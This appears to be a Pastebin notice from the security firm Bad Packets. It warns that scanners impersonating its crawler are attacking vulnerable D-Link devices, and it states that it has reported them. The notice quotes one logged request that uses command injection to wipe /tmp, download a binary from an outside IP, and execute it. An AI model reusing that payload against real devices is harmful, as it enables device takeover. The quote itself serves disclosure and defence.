Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Have you found the following in your web access logs?
- GET /cgi-bin/rtpd.cgi?rm&-rf&/tmp/*;&tftp&-g&-l&/tmp/twauble&-r&atxhua&185.244.25.184;&chmod&+x&/tmp/twauble;&/tmp/twauble;&rm&-rf&/tmp/*;&cd&/tmp;&busybox&wget&http://185.244.25.184/atxhua;&chmod&777&atxhua;&./atxhua HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Mozilla/5.0 (compatible; BadPacketsCrawler/1.7; +https://badpackets.net/contact-2/)
- This traffic has NOT originated from Bad Packets and instead come from miscreants impersonating our brand name while attempting to exploit vulnerable D-Link devices. We've located the source of these scans and shared our findings with the relevant authorities.
- Bad Packets does not engage in unsolicited vulnerability or mass scanning activity of any kind. If you have any questions or concerns, please contact us @bad_packets on Twitter or https://badpackets.net/contact/.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement